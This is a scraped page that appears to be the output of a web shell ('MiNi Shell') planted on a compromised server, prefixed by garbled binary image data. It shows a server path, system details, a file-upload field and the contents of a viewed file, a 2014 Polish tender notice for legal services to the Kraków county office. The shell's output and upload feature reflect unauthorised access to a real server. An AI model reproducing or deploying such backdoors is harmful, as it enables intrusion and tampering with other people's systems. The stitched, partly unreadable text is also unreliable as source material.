JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140520/170070-N-2014.html

<p class="kh_header"><b>Kraków: obsługa prawna Starostwa Powiatowego w Krakowie</b><br>
<b>Numer ogłoszenia: 170070 - 2014; data zamieszczenia: 20.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Krakowski , Al. Słowackiego 20, 30-037 Kraków, woj. małopolskie, tel. 12 634 42 70, faks 12 6335294.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> obsługa prawna Starostwa Powiatowego w Krakowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest obsługa prawna Starostwa Powiatowego w Krakowie. Zamówienie obejmuje również obsługę powiatowych jednostek organizacyjnych jedynie
w zakresie ich spraw będących przedmiotem sesji Rady Powiatu w Krakowie oraz posiedzeń Zarządu Powiatu w Krakowie. 

1. Zakres obsługi prawnej:

Obsługa prawna obejmować będzie w szczególności:
1)	udzielanie porad prawnych i konsultacji prawnych w zakresie stosowania prawa 
w odniesieniu do wykonywanych przez Powiat zadań, 
2)	udział w opracowywaniu oraz opiniowanie projektów przepisów w tym przepisów prawa miejscowego w szczególności statutów, regulaminów, zarządzeń i innych dokumentów regulujących funkcjonowanie organów powiatu, Starostwa Powiatowego w Krakowie oraz jednostek organizacyjnych Powiatu, 
3)	udział w opracowywaniu oraz opiniowanie pod względem prawnym projektów aktów prawa wydawanych przez Zarząd Powiatu w Krakowie oraz projektów uchwał Rady Powiatu w Krakowie i innych aktów prawnych związanych z zakresem działalności Zamawiającego, 
4)	udział w sesjach Rady Powiatu  w Krakowie i obsługa prawna sesji, 
5)	udział w posiedzeniach Zarządu Powiatu  w Krakowie po zawiadomieniu Kancelarii o takiej konieczności przez  przewodniczącego Zarządu, 
6)	udział w opracowywaniu oraz opiniowanie projektów umów cywilno - prawnych, porozumień, ugód  i innych uzgodnień,
7)	opiniowanie pod względem prawnym wskazanej przez Zamawiającego korespondencji z organami administracji publicznej i innymi instytucjami oraz osobami prawnymi i fizycznymi, 
8)	opiniowanie projektów udzielanych pełnomocnictw, upoważnień, 
9)	udział w negocjowaniu warunków umów i porozumień oraz ugód zawieranych przez Powiat Krakowski i Starostę reprezentującego Skarb Państwa,
10)	składanie pozwów do sądu w terminie 21 dni od otrzymania informacji pisemnej wraz z kompletną dokumentacją sprawy od Zamawiającego z zastrzeżeniem pkt 11, chyba że z ważnych powodów  Zamawiający wskaże w piśmie inny termin,
11)	zgłaszanie braku zasadności kierowania pozwu do sądu wraz z przedstawieniem  na piśmie wszelkich konsekwencji wnoszenia powództwa w terminie 14 dni od daty otrzymania pełnej dokumentacji sprawy od Zamawiającego,
12)	składanie apelacji i skarg  kasacyjnych do sądu po otrzymaniu przez Zamawiającego 
z odpowiednim wyprzedzeniem, pisemnej informacji oraz dokumentów,
13)	przekazywanie  Zamawiającemu odpisów złożonych apelacji i skarg kasacyjnych oraz kopii wniosków w sprawach prowadzonych przez  Powiat Krakowski i Starostę w terminie  3 dni roboczych od daty złożenia,
14)	niezwłoczne pisemne przekazywanie Zamawiającemu  informacji dotyczącej konieczności   uiszczenia przez niego opłaty sądowej lub urzędowej  niezbędnej do wpłacenia w związku z prowadzonymi na rzecz Zamawiającego sprawami, nie później niż 7 dni  roboczych przed upływem terminu zapłaty, 
15)	występowanie przed sądami i urzędami, a przede wszystkim sądami powszechnymi, organami administracji państwowej w tym  pełnienie zastępstwa prawnego 
i procesowego, 
16)	prowadzenie spraw w zakresie określonym w pkt 15,
17)	opracowywanie projektów pism sądowych, projektów pism do organów ścigania oraz innych instytucji w związku z prowadzonymi postępowaniami administracyjnymi, egzekucyjnymi, cywilnymi i karnymi,
18)	stałe doradztwo prawne w zakresie rozwiązywania problemów prawnych związanych z bieżącą działalnością wydziałów Starostwa Powiatowego w Krakowie, równorzędnych komórek organizacyjnych i samodzielnych stanowisk pracy,
19)	składanie właściwemu dyrektorowi wydziału Starostwa  Powiatowego w Krakowie pisemnej informacji po każdej przeprowadzonej rozprawie oraz po otrzymaniu  w toku prowadzenia sprawy przez sądem lub urzędem  informacji mogących mieć wpływ na bieg sprawy, których nie otrzymał Zamawiający, 
20)	przekazywanie Zamawiającemu kopii każdego rozstrzygnięcia kończącego sprawę w danej instancji  pisemnie lub e-mailem w terminie 3 dni roboczych od daty jego otrzymania,
21)	udzielanie na wniosek Zamawiającego dodatkowych  ustnych lub pisemnych informacji na temat stanu spraw Zamawiającego prowadzonych przez Wykonawcę oraz przewidywanych  terminów  wykonania określonych czynności, 
22)	współudział w organizowaniu szkoleń wewnętrznych szczególnie z zakresu nowych rozwiązań prawnych,
23)	 bieżące informowanie osób kierujących wydziałami, równorzędnymi komórkami  organizacyjnymi i zatrudnionych na samodzielnych stanowiskach pracy w Starostwie o zmianach w przepisach prawa, o orzecznictwie i interpretacjach,
24)	inne czynności według potrzeb zamawiającego związane z obsługą prawną.

2. Zasady świadczenia usług: 

1. Świadczenie usług odbywać się będzie przez 5 dni w tygodniu w wymiarze co najmniej 6 godzin dziennie, w godzinach pracy Starostwa Powiatowego w Krakowie, w jego siedzibie w Krakowie, al. Słowackiego 20. W pozostałym czasie Wykonawca zobowiązany jest do pozostawania do dyspozycji Zamawiającego poprzez kontakt mailowy i telefoniczny oraz osobisty w miejscu wskazanym przez Wykonawcę.

2. Świadczenie usług na rzecz Zamawiającego w  siedzibie Starostwa musi wykonywać co najmniej 1 osoba posiadająca uprawnienia do wykonywania zawodu radcy prawnego lub adwokata, przez  wyżej określony czas  niezależnie od innych obowiązków Wykonawcy  wobec  Zamawiającego, określonych w SIWZ oraz w umowie.

3. Obsługa prawna sesji Rady Powiatu w Krakowie oraz występowanie przed sądami i urzędami  nie zwalnia Wykonawcy od zapewnienia świadczenia  usług określonych w SIWZ w  przedmiocie zamówienia  pkt 2.1.  

4. Wykonawca wyznaczy osobę  koordynującą  obsługę prawną posiadającą kwalifikacje zawodowe  w postaci  uprawnień radcy prawnego lub adwokata.  

5. W przypadku zastępstwa procesowego przed sądem, kwota z tytułu zwrotu kosztów zastępstwa procesowego, zasądzona na rzecz zamawiającego przez sąd zostanie wypłacona Wykonawcy, po jej dobrowolnej wpłacie lub wyegzekwowaniu od dłużnika..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.10.00.00-5, 79.11.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.07.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymaga się</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie określił warunku - Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w złożonym oświadczeniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania wiedzy i doświadczenia, tj. w okresie ostatnich trzech lat przed upływem terminu składania ofert wykonali lub wykonują co najmniej dwie usługi o podobnym charakterze. Przez usługę o podobnym charakterze Zamawiający rozumie usługę polegającą na stałej* obsłudze prawnej jednostki samorządu terytorialnego. * Pod pojęciem stałej obsługi prawnej rozumie się obsługę prawną jednostki samorządu terytorialnego świadczoną  w sposób nieprzerwany przez okres co najmniej dwóch lat. Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w złożonym oświadczeniu, wykazie wykonanych lub wykonywanych głównych usług, dowodach czy wskazane usługi zostały wykonane lub sa wykonywane nalezycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie określił warunku - Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w złożonym oświadczeniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania osobami zdolnymi do wykonania zamówienia tj. dysponują lub będą dysponować co najmniej czterema osobami,  które będą uczestniczyć w wykonywaniu zamówienia, w szczególności będą odpowiedzialne za świadczenie usługi, z których każda posiada kwalifikacje zawodowe w postaci uprawnień radcy prawnego lub adwokata, zgodnie z przepisami ustawy z dnia 6 lipca 1982 r. o radcach prawnych (tj. Dz. U. z 2010 r. Nr 10, poz.65 z póź.zm ) lub ustawy z dnia 26 maja 1982 r.- Prawo o adwokaturze (tj. Dz. U. z 2009 r., Nr 146 poz. 1188 z późn. zm.), w tym co najmniej dwoma osobami spośród wykazanych osób, które posiadają co najmniej dwuletnie doświadczenie w świadczeniu stałej* obsługi prawnej jednostek samorządu terytorialnego jako radca prawny lub adwokat. 
* Pod pojęciem stałej obsługi prawnej rozumie się obsługę prawną jednostki samorządu terytorialnego świadczoną  w sposób nieprzerwany przez okres co najmniej dwóch lat. Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w złożonym oświadczeniu oraz wykazie osób.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie określił warunku - Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w złożonym oświadczeniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty -  załącznik nr 1.
Oświadczenie dotyczące przynależności do grupy kapitałowej - załącznik nr 4.
Pisemne zobowiązanie innych podmiotów do oddania wykonawcy swojej wiedzy i doświadczenia na okres korzystania z nich przy wykonywaniu zamówienia wraz z informacją o zakresie i sposobie udostępnienia zasobów, jeżeli w wykazie wykonanych głównych usług wykonawca wskazał doświadczenie innych podmiotów. Poleganie na wiedzy i doświadczeniu innych podmiotów oznacza ich rzeczywisty udział w realizacji zamówienia.
Pisemne zobowiązanie innych podmiotów do oddania do dyspozycji wykonawcy osób zdolnych do wykonania zamówienia na okres korzystania z nich przy wykonywaniu zamówienia wraz z informacją o zakresie i sposobie udostępnienia zasobów, jeżeli w wykazie osób wykonawca wskazał osoby, którymi będzie dysponował, a które będą brały udział w realizacji zamówienia.
Formularz o podwykonawcach - załącznik nr 7. 
Pełnomocnictwo do reprezentowania Wykonawcy w postępowaniach o udzielenie zamówienia publicznego, w tym do podpisywania oferty i pozostałych dokumentów przetargowych, jeżeli osoba dokonująca tych czynności nie jest wykazana w dokumencie rejestracyjnym (ewidencyjnym).
Pełnomocnictwo do reprezentowania podmiotów występujących wspólnie. Wykonawcy występujący wspólnie (konsorcjum) muszą ustanowić pełnomocnika (lidera) do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - liczba osób którymi dysponuje lub będzie dysponować Wykonawca (szczegółowy opis kryterium zawiera siwz) - 40</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy. Wprowadzone zmiany dotyczyć mogą:
1) zmiany osoby świadczącej usługę ( Wykonawca może dokonać zmiany osoby prawnika świadczącego usługę przedstawionego w ofercie, jedynie za uprzednią pisemną zgodą Zamawiającego, akceptującego nowego prawnika. Wykonawca z własnej inicjatywy proponuje zmianę prawnika w następujących przypadkach: a) śmierci, choroby lub innych zdarzeń losowych prawnika ; b) nie wywiązywania się prawnika z obowiązków wynikających z Umowy; c) jeżeli zmiana prawnika stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy (np. rezygnacji, itp.). W przypadku zmiany prawnika, nowa osoba musi spełniać wymagania określone dla dotychczasowego),
2) zmiany wynagrodzenia Wykonawcy z powodu zmiany stawki podatku VAT,
3) okoliczności których nie można było przewidzieć w chwili zawarcia umowy. 
Zmiany wprowadzone zostaną po wcześniejszym zgłoszeniu przez którąkolwiek ze stron umowy, faktu zaistnienia okoliczności warunkującej konieczność wprowadzenia zmiany oraz obustronnej ich akceptacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kraków al. Słowackiego 20 pok. 104.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2014 godzina 09:00, miejsce: Kraków, al. Słowackiego 20, pok. 203, II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com